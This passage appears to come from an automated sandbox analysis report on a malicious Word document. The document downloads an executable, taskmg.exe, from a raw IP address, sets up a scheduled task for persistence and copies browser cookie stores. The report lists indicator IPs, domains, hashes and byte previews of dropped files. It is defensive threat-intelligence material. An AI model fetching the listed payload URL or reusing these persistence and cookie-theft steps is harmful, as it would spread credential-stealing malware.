                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              18:14:21API Interceptor107x Sleep call for process: powershell.exe modified
                              18:14:27API Interceptor1096x Sleep call for process: taskmg.exe modified
                              18:14:33API Interceptor1x Sleep call for process: schtasks.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.198.143Document.exeGet hashmaliciousBrowse
                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                  Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                    TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                      E invoice.exeGet hashmaliciousBrowse
                                        UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                          PNkBekAKOeQD1Jj.exeGet hashmaliciousBrowse
                                            PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                              DHL Documentos de envio originales.exeGet hashmaliciousBrowse
                                                XSsBxQH419.exeGet hashmaliciousBrowse
                                                  devis.xlsxGet hashmaliciousBrowse
                                                    Quotation- 306013SQ.exeGet hashmaliciousBrowse
                                                      PO 4601056018.exeGet hashmaliciousBrowse
                                                        Purchase Order Vale-60,000MT.exeGet hashmaliciousBrowse
                                                          BOQ 11745692.exeGet hashmaliciousBrowse
                                                            dhl_doc9548255382.exeGet hashmaliciousBrowse
                                                              ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                Quotation.xlsxGet hashmaliciousBrowse
                                                                  Advice Payment Copy.exeGet hashmaliciousBrowse
                                                                    IMG-20211110-OWA001.exeGet hashmaliciousBrowse
                                                                      208.91.199.225Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                        P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                          STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                            XsFFv27rls.exeGet hashmaliciousBrowse
                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                E invoice.exeGet hashmaliciousBrowse
                                                                                  Bill of lading.exeGet hashmaliciousBrowse
                                                                                    devis.xlsxGet hashmaliciousBrowse
                                                                                      dhl_doc9548255382.exeGet hashmaliciousBrowse
                                                                                        PO 4601056018.exeGet hashmaliciousBrowse
                                                                                          ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                                            Quotation.xlsxGet hashmaliciousBrowse
                                                                                              Purchase Order 20000MT.exeGet hashmaliciousBrowse
                                                                                                Invoice- Shping DOCX.exeGet hashmaliciousBrowse
                                                                                                  Invoice No ANT19-20646.exeGet hashmaliciousBrowse
                                                                                                    8rwaRyxu9W9IUfB.exeGet hashmaliciousBrowse
                                                                                                      RZB0ljZiQMqYfAw.exeGet hashmaliciousBrowse
                                                                                                        Shipment Details.exeGet hashmaliciousBrowse
                                                                                                          urgent order 1065.exeGet hashmaliciousBrowse
                                                                                                            NEW PURCHASE ORDER LIST NOV2021.exeGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              us2.smtp.mailhostbox.comDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              rTyPU1zmY5PsyNl.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TransactionSummary_22-11-2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              (KOREA SHIPPING - KLCSM).exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              AWB Number 0004318855.DOCX.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              PUBLIC-DOMAIN-REGISTRYUSDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                              • 207.174.212.140
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                              • 199.79.62.99
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.181
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              PUBLIC-DOMAIN-REGISTRYUSDocument.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                              • 207.174.212.140
                                                                                                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              DOC221121.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.198.143
                                                                                                              STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                              • 199.79.62.99
                                                                                                              E invoice.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.224
                                                                                                              TOwYernH3DhfPER.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.181
                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                              • 103.50.163.110
                                                                                                              Bill of lading.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.225
                                                                                                              UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                                                                                              • 208.91.199.223

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Reputation:low
                                                                                                              IE Cache URL:http://173.232.204.89/taskmg.exe
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3263CED7.png
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:370 sysV pure executable
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262160
                                                                                                              Entropy (8bit):0.0018490830516166626
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:j//VqllXWkjd0d8lltFIlfylvxtlPLl:j//g8od0mlXuu
                                                                                                              MD5:768311D8560A7B68F932635AFBB0BE29
                                                                                                              SHA1:2682A89B637FA735C3AEA5775BCEAC01DFA279D6
                                                                                                              SHA-256:B85834248C00C5651F339C9C062EEAF649859E815E1A6E4116E2B80F025DAE44
                                                                                                              SHA-512:A6843C4612C60D4D0FC3BA6E7C3104C64A725E14ABC8AD41C6A4875A2AEE8C3A1091B6B60BF7FC2199A6368733AFEF92C713EA710171441AC29731E61432E3EF
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: X.C......{^.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\867A2AEC.wmf
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3712
                                                                                                              Entropy (8bit):5.038125428163887
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:wk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:wk7Awam8fI4s0f5ap3
                                                                                                              MD5:A471EB10EDF79F5E92490204E5B3C016
                                                                                                              SHA1:094EB944A7BE50A54FF8E215207A5B2D24D7408E
                                                                                                              SHA-256:96065A620C5F15B1A8BC2291D5D241832AAFB187475AD45576C10BAA689619FD
                                                                                                              SHA-512:0B432B8D56C81B9F52A92C2977AE34DE5EFA1B73D01B10DB9B72701D7D16BCB9ABE05760A095253A3FA4DA7A57E588C88C7CC15700308BFF9CFFBEE2A11CAA15
                                                                                                              Malicious:false
                                                                                                              Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........s....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):214016
                                                                                                              Entropy (8bit):4.757365759711338
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:5Eabzacasapa2H/Na7yTAEabzacasapa2H/Na7pKv:Xbzacasapa2HY7hbzacasapa2HY7
                                                                                                              MD5:EC345C74FAF6F653C35C60E305D8914E
                                                                                                              SHA1:466F1FF61AD7D611B31932A4D861330B88535B9C
                                                                                                              SHA-256:7B6862C9A303B229AEC0C3D8F45F7291447F4FDD0ADE59513E8E8278B2BB87F6
                                                                                                              SHA-512:A563D3AA6EEDFD3B4BED6C372C0B4A4055D71F75D2A5B54CA796AF2CFE6E65744939C0539D43F0ECE6600A570ADE3F4E44710E1DF3EF6CAD437E76B121EB759D
                                                                                                              Malicious:false
                                                                                                              Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DFB1A07-CB4F-472F-B236-A3BF6A79B957}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):44098
                                                                                                              Entropy (8bit):2.8795771285294594
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:dT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:5Fia0Dqeb0nstw29rVzWSgm58F
                                                                                                              MD5:0639D028278A2669A3D479D75A5ED861
                                                                                                              SHA1:437C61B35B9C7FFBD4C4B41B0BBAE84E228FA1F9
                                                                                                              SHA-256:360C3B6069F9DFE479ADFEF7893BFA0AEDB86A4239E117DFAA33EA4919EC17CB
                                                                                                              SHA-512:C03E435B6FD4B9348642FA05985199C60E0684CFB5FB2BA71928F414E12BEA15A5AF88FD70C3B9052D2F6E0E3E97FE381E0A9DA4E144C3C4424410F3AA2A524B
                                                                                                              Malicious:false
                                                                                                              Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.PJe...CJ..OJ..QJ..U..^J..aJ.
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1024
                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                              Malicious:false
                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C8C94021-4E02-4955-8AF8-3AD414138F04}.tmp
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1536
                                                                                                              Entropy (8bit):1.3554734412254814
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzLl/
                                                                                                              MD5:64E043ACB99A5A7A6BEDF8B83BEA3CF6
                                                                                                              SHA1:BD260E7730F22912CEB711384253D9820AF96EB4
                                                                                                              SHA-256:47E5EE0092D08DEF032FD11BF38DD8EE9827BC1809BA6722C439A24EA6634FE7
                                                                                                              SHA-512:626F3FCD72C8AE3DF333D56EFD4CB631ED849F395ED5771CB8DA4F67938D94693EF798E33857700B8CE7EDBAF6C9C74CC05BD20ACADC06D5E2B4F4571E6131C2
                                                                                                              Malicious:false
                                                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):97522
                                                                                                              Entropy (8bit):4.490013837211777
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:VEabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VEabzacasapa2H/Na7M
                                                                                                              MD5:330B9EB7A9C4CA0E21376FC14CCD2CAD
                                                                                                              SHA1:B42ADF2B6AAAE3AD3BC2CC02E4CACD7A1F47F520
                                                                                                              SHA-256:002B90B761DC216BCA8DB9DCED5F3E6802C9BB672CDFA9045FBECC40C5C128F8
                                                                                                              SHA-512:6208CE1A1B4129BEBCE827463B223DAFF88650C26E989E84A7B34E562CB54571AE204BF6A991C5DFA7B6F65EEF77CB83478885B1B793CBA2A337DE17CAA10CD2
                                                                                                              Malicious:true
                                                                                                              Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                              Malicious:false
                                                                                                              Preview: [ZoneTransfer]..ZoneId=3..
                                                                                                              C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1575
                                                                                                              Entropy (8bit):5.117905043975538
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTav
                                                                                                              MD5:F5A0FC758800632A9CADD5E7E0FC7FA1
                                                                                                              SHA1:5E6F0BD54FDA0A2CE2929E290E6ADC4163BCE9B1
                                                                                                              SHA-256:4E940EAC9417D347B22F9D86C362B6C00EC2B7D2A69D628A71E899099F00A185
                                                                                                              SHA-512:0282523CEC0CFA09A687DC24C1D494EE889E072BDD16D3AE17DB9F66D1EAC174C1A38F616A4D190DD6129DEC18695C807A3FD11AE0DD4D16F43A501685662E98
                                                                                                              Malicious:true
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                              C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Chrome\Default\Cookies
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28672
                                                                                                              Entropy (8bit):0.9650411582864293
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                                              MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                                              SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                                              SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                                              SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                                                              Process:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                                                              Category:dropped
                                                                                                              Size (bytes):524288
                                                                                                              Entropy (8bit):0.08107860342777487
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                                              MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                                              SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                                              SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                                              SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Reconfirm The Details.LNK
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:14:15 2021, length=393215, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1069
                                                                                                              Entropy (8bit):4.580975445314464
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:8JuGb/XTTcLImuzUHheiclUvDv3qGniR7m:8JuI/XTAXu4HhaO+GiFm
                                                                                                              MD5:3FCECFD0FE72594F4F6E0F65A3EE4E5D
                                                                                                              SHA1:8660FB634C3AB41C385C9581CBD1D4057A18EA54
                                                                                                              SHA-256:57DEDF327857FC59B8D5BCB93CE2F0B55DD288B53B89206393AB75823A00CE2A
                                                                                                              SHA-512:755CE5A3F7DC93AEE0643B7E050FA839428BAD3DA63714512DC86D20338DB3E1DFD5A729248234B01BE6150D2F6F8F03336491C6CA0798B7283DF39124839C01
                                                                                                              Malicious:false
                                                                                                              Preview: L..................F.... ...4.h>...4.h>....~POk................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....zS.. .RECONF~1.DOC..`.......S...S..*.........................R.e.c.o.n.f.i.r.m. .T.h.e. .D.e.t.a.i.l.s...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\Reconfirm The Details.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.c.o.n.f.i.r.m. .T.h.e. .D.e.t.a.i.l.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700.........
                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
